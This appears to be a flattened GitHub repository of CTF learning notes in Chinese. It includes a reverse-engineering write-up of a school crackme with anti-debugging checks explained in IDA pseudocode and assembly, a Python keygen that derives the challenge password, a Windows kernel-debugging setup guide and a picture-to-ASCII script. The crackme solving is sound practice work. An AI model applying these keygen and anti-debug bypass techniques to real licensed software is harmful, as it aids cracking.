106 | 3. [CTFs](https://github.com/ctfs) 各种wp
107 | 4. [IDF 实验室](http://ctf.idf.cn/) 有一些基础的re
108 | 5. [CTF Time](https://ctftime.org/) 国外的ctfs 有难度orz
109 | 110 | ## 6.catalog 111 | ### 1 ./Reverse 112 | 做的少了 = = 基本之前做的都没有上传
113 | - ./driver 114 | 基本驱动调试环境配置
115 | 116 | ### 2 ./Pwn 117 | 关于pwn的题目和练习资源
118 | 119 | - ./examples 120 | 一些基本技巧
121 | - ./pwnable 122 | 一个很好的练习平台 不过没做多少
123 | - ./examples 124 | 典型的利用例子
125 | - ./c++ keywords 126 | 一些数的取值范围
127 | 128 | 129 | ## change 130 | 131 | 新建`CTFs`,之后大部分在`CTFs`里面放比赛的一些题. 132 | -------------------------------------------------------------------------------- /Reverse/README.md: -------------------------------------------------------------------------------- 1 | # 做re需要耐心 2 | 3 | ## exercises 4 | [re.kr](http://reversing.kr/index.php) 5 | 6 | ## resources 7 | IDA Pro 8 | 9 | -------------------------------------------------------------------------------- /Reverse/cumt2016_re3/03.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | alph1 = "onhtxdsqvpzcrefjigklfzbapvdqsxzrcefimlku" 3 | alph2 = "zscbmdvholblzftuhsxsbchanrcdqjvqfinotcbu" 4 | alph3 = "pzywrvdcbqeuafsxgmlitnkopvdqsxtdnapcuwys" 5 | 6 | username = "041751300132" 7 | pwd1 = "" 8 | pwd2 = "" 9 | pwd3 = "" 10 | 11 | ad1_1 = 0 12 | ad1_2 = 0 13 | ad1 = 10*(ad1_1 + 2 * ad1_2) 14 | #10 * (bIsIda + 2 * bOD_52pojie) 15 | ad2_1 = 1 16 | ad2_2 = 1 17 | ad2 = 10*(ad2_1 + 2 * ad2_2) 18 | #5 * (v3 + 2 * v2) + 2 19 | ad3_1 = 0 20 | ad3_2 = 1 21 | ad3 = 10*(ad3_1 + 2 * ad3_2) 22 | 23 | password = "" 24 | 25 | for s in username: 26 | index = int(s) 27 | pwd1 += alph2[ad1+index] 28 | pwd2 += alph3[ad2+index] 29 | pwd3 += alph1[ad3+index] 30 | 31 | passwd = pwd1[0:4] + pwd2[4:8] + pwd3[8:12] 32 | 33 | for s in passwd: 34 | if s == 'z': 35 | password += 'a' 36 | else: 37 | password += chr(ord(s) + 1) 38 | 39 | print password 40 | 41 | 42 | -------------------------------------------------------------------------------- /Reverse/cumt2016_re3/README.md: -------------------------------------------------------------------------------- 1 | ###reverse03: 2 | 闲着无聊 做了学校的ctf平台的一题(之前遗留了) 3 | 先uxp脱壳 然后拖进ida 4 | 主要代码如下 5 | ```C++ 6 | falgDug = 0; 7 | inUser = 0; // [bp-14h] 开始依次 48, 52, 49, 55, 53, 49, 51, 48, 48, 49, 51, 50 8 | v_13h = 0; 9 | v_Fh = 0; 10 | v22 = 0; 11 | v23 = 0; 12 | inPass = 0; 13 | v13 = 0; 14 | v14 = 0; 15 | v15 = 0; 16 | v16 = 0; 17 | v17 = 0; 18 | v18 = 0; 19 | printf("输入用户名:"); 20 | scanf("%15s", &inUser); 21 | printf("\n"); 22 | printf("输入密码:"); 23 | scanf("%25s", &inPass); 24 | iU = strlen(&inUser); 25 | for ( i = 0; i < iU; ++i ) 26 | { 27 | if ( *(&inUser + i) < '0' || *(&inUser + i) > '9' ) 28 | { 29 | printf("用户名必须为数字"); 30 | goto LABEL_13; 31 | } 32 | } 33 | v9 = GetTickCount(); 34 | v5 = &loc_401052; 35 | IsOver = 0x40; 36 | do 37 | { // check int 38 | if ( !IsOver ) 39 | break; // 检测int3断点防止调试 40 | getInt3 = *(_BYTE *)v5 == 0xCCu; 41 | v5 = (char *)v5 + 1; 42 | --IsOver; 43 | } 44 | while ( !getInt3 ); 45 | if ( getInt3 ) 46 | falgDug = 1; 47 | isInt = (GetTickCount() - v9) / 0x3E8 > 1; // 判断时间,防止调试 48 | produceAlph1(falgDug, (int)&inUser, isInt); 49 | produceAlph2((char *)&v_13h + 3); 50 | produceAlph3((char *)&v_Fh + 3); 51 | checkPassword(&inPass); 52 | LABEL_13: 53 | system("pause"); 54 | return 0; 55 | ``` 56 | 看到解密的数组列表 57 | ```C++ 58 | alph1='onhtxdsqvpzcrefjigklfzbapvdqsxzrcefimlku'
59 | alph2='zscbmdvholblzftuhsxsbchanrcdqjvqfinotcbu'
60 | alph3='pzywrvdcbqeuafsxgmlitnkopvdqsxtdnapcuwys'
61 | 这里是在ida里算偏移算出来的
62 | username:041751300132
63 | 对应位置为
64 | bp-[h] 14 13 12 11 10 0f 0e 0d 0c 0b 0a 09
65 | // 48, 52, 49, 55 53, 49, 51, 48 48, 49, 51, 50
66 | ``` 67 | 注意到 68 | ```C++ 69 | produceAlph1中有个检测int3断点的程序,防止OD调试 70 | v9 = GetTickCount(); 71 | v5 = &loc_401052; 72 | IsOver = 0x40; 73 | do 74 | { // check int 75 | if ( !IsOver ) 76 | break; // 检测int3断点防止调试 77 | getInt3 = *(_BYTE *)v5 == 0xCCu; 78 | v5 = (char *)v5 + 1; 79 | --IsOver; 80 | } 81 | while ( !getInt3 ); 82 | if ( getInt3 ) 83 | falgDug = 1; 84 | ``` 85 | ### IDA伪指令解析错误: 86 | 87 | 怎么写脚本调都不对,问了学长,flag对了,但是伪C代码逻辑有改地方不对,找了半天 88 | ``` C++ 89 | f_8 = *((_BYTE *)&aIdaq64_exe[5 * (isDbg + 2 * (unsigned __int8)isFsd) + 2] + *(_BYTE *)pThis); 90 | //反过去汇编才发现ida F5解析错了 应该是: 91 | //*((_BYTE *)&aIdaq64_exe[2 * 5 * (isDbg + 2 * (unsigned __int8)isFsd)]才对吧 92 | ``` 93 | 好坑啊,直接上汇编吧 94 | ```asm 95 | .text:00401420 var_4 = dword ptr -4 96 | .text:00401420 97 | .text:00401420 push ebp 98 | .text:00401421 mov ebp, esp 99 | .text:00401423 push ecx 100 | .text:00401424 push ebx 101 | .text:00401425 push esi 102 | .text:00401426 mov esi, ecx 103 | .text:00401428 mov [ebp+var_4], 0 ; var_4 = 0 104 | .text:0040142F mov cl, 1 105 | .text:00401431 mov eax, large fs:'0' 106 | .text:00401437 mov eax, [eax+68h] ; eax += fs:'0' 107 | .text:0040143A mov [ebp+var_4], eax 108 | .text:0040143D test byte ptr [ebp+var_4], 'p' 109 | .text:00401441 mov eax, 0 110 | .text:00401446 movzx ebx, cl ; if (var_4 == 'p') ebx = 1 111 | .text:00401446 ; else ebx = 0 112 | .text:00401449 cmovnz ebx, eax 113 | .text:0040144C call ds:IsDebuggerPresent 114 | .text:00401452 neg eax ; if (IsDebuggerPresent) eax = 1 115 | .text:00401452 ; else eax = 0 116 | .text:00401454 movzx ecx, bl ; 设isFsd = bl 117 | .text:00401457 sbb eax, eax 118 | .text:00401459 neg eax ; 设isDbg = eax 119 | .text:0040145B lea eax, [eax+ecx*2] ; eax = isDbg + 2*isFsd 120 | .text:0040145E lea ecx, [eax+eax*4] ; ecx = 5*(eaxL) = 5*(isDbg + 2*isFsd) 121 | .text:00401461 movsx eax, byte ptr [esi] 122 | .text:00401464 movzx eax, byte ptr [eax+ecx*2+4021A0h] ; 2*ecx = 2*5*(isDbg + 2*isFsd) = 10*(isDbg + 2*isFsd) 123 | .text:0040146C mov f_8, al ; 当 isDbg=0 isFsd=1 该值为 10*2-20 124 | .text:0040146C ; 和ad3_1 = 0 125 | .text:0040146C ; ad3_2 = 1 126 | .text:0040146C ; ad3 = 5*(ad3_1 + 2 * ad3_2 + 2) = 20 一致 127 | .text:00401471 movsx eax, byte ptr [esi+1] 128 | .text:00401475 movzx eax, byte ptr [eax+ecx*2+4021A0h] 129 | .text:0040147D mov f_9, al 130 | .text:00401482 movsx eax, byte ptr [esi+2] 131 | .text:00401486 movzx eax, byte ptr [eax+ecx*2+4021A0h] 132 | .text:0040148E mov f_10, al 133 | .text:00401493 movsx eax, byte ptr [esi+3] 134 | .text:00401497 pop esi 135 | .text:00401498 pop ebx 136 | .text:00401499 movzx eax, byte ptr [eax+ecx*2+4021A0h] 137 | .text:004014A1 mov f_11, al 138 | .text:004014A6 mov esp, ebp 139 | .text:004014A8 pop ebp 140 | .text:004014A9 retn 141 | .text:004014A9 produceAlph3 endp 142 | 143 | ( 144 | neg r 指令的结果是设置Carry Flag, 也就是借位的标志位. 因为neg r的操作语义是0 - r, 零减去任何非零的数,都会产生"借位"的. 当然这里r寄存器中的值也被改掉了,不过没关系, 反正它都要被稍后的指令再改掉的. 145 | sbb r, r 指令设置r为零或者-1. 因为语义为用一个值去减掉它自身, 结果当然是零啰. 但是,这样做会把carry flag一起给减掉的, 该指令的公式是 146 | r – r – CF –> r 147 | 148 | 为零(ZF=1) CMOVZ AX, BX 149 | CMOVZ r32, r/m32 CMOVZ EAX, EB 150 | ) 151 | ``` 152 | #### 推广 153 | 题目来自:http://219.219.60.244/challenges.php 普普通通的逆向 154 | -------------------------------------------------------------------------------- /Reverse/cumt2016_re3/reverse03.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Reverse/cumt2016_re3/reverse03.exe -------------------------------------------------------------------------------- /Reverse/cumt2016_re3/reverse03.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Reverse/cumt2016_re3/reverse03.idb -------------------------------------------------------------------------------- /Reverse/driver/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## Preface 3 | 4 | 一直没有接触windows驱动,这里稍微学习一下 5 | 6 | ## 配置环境 7 | 8 | 配置环境一直是很麻烦的事情,后来终于找到一个很方面的方法
9 | 详见[fuzzysecurity kernel exp](http://www.fuzzysecurity.com/tutorials/expDev/14.html)
10 | 11 | 主机:Windows10 64bit
12 | target:Windows10 64bit
13 | 调试工具:windbg64bit 14 | 15 | ### 安装 16 | 17 | 首先需要到官网下载visual studio和winsdk
18 | 19 | ### 目标机设置 20 | 21 | 直接安装VirtualKD 中target的vminstall.exe
22 | 完成后重启系统,因为用的是win10调试,所以开机应该按F8进入免数字签名模式。
23 | 24 | ### debug 25 | 26 | 1. 打开 vmmon64.exe
27 | 2. 设置 28 | ![windbg setup](vmmwindbg.png) 29 | 点击Debugger path设置为64为windbg的位置。 30 | 3. windbg运行之后,在起点就断下了 31 | 32 | ## summary 33 | 简单的调试环境就配置好了,有工具就是简单 34 | ### other 35 | 此外,还可以设置ida来调试
36 | 详见[ida+windbg](http://ydc1992.github.io/2016/12/05/IDA-6-8-VirtualKD-WINDBG%E8%B0%83%E8%AF%95%E5%86%85%E6%A0%B8/)
37 | http://bobao.360.cn/learning/detail/3399.html
38 | -------------------------------------------------------------------------------- /Reverse/driver/vmmwindbg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Reverse/driver/vmmwindbg.png -------------------------------------------------------------------------------- /pic2ascii.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | #coding:utf-8 3 | from PIL import Image 4 | import optparse 5 | 6 | ascii_list = list(r"$@&%B#=-. ") 7 | 8 | # RGB to char 9 | def rgb2char(r, g, b): 10 | gray = int((19595 * r + 38469 * g + 7472 * b) >> 16) # ‘RGB-灰度值’转换公式 11 | unit = 256.0/len(ascii_list) # ascii_char中的一个字符所能表示的灰度值区间 12 | return ascii_list[int(gray/unit)] 13 | 14 | def prod_ascii(imgfile, outfile, width, height): 15 | f = open(outfile, 'wr') 16 | im = Image.open(imgfile) 17 | 18 | im = im.resize((width, height), Image.NEAREST) 19 | str_asc = "" 20 | 21 | for h in xrange(height): 22 | for w in xrange(width): 23 | str_asc += rgb2char(*im.getpixel((w, h))[:3]) 24 | str_asc += '\n' 25 | 26 | f.write(str_asc) 27 | f.close() 28 | 29 | 30 | def main(): 31 | parser = optparse.OptionParser('usage %prog -i -o -w -l '); 32 | parser.add_option('-i', dest='imgfile', type='string', help='specify input image file name') 33 | parser.add_option('-o', dest='outfile', type='string', help='specify output ascii file name') 34 | parser.add_option('-w', dest='width', type='string', help='specify output width') 35 | parser.add_option('-l', dest='height', type='string', help='specify output height') 36 | (options, args) = parser.parse_args() 37 | imgfile = options.imgfile 38 | outfile = options.outfile 39 | width = options.width 40 | height = options.height 41 | if (imgfile == None) | (outfile == None) | (width == None) | (height == None): 42 | print parser.usage 43 | exit(0) 44 | width = int(width) 45 | height = int(height) 46 | prod_ascii(imgfile, outfile, width, height) 47 | 48 | 49 | if __name__ == '__main__': 50 | main() 51 | 52 | 53 | 54 | --------------------------------------------------------------------------------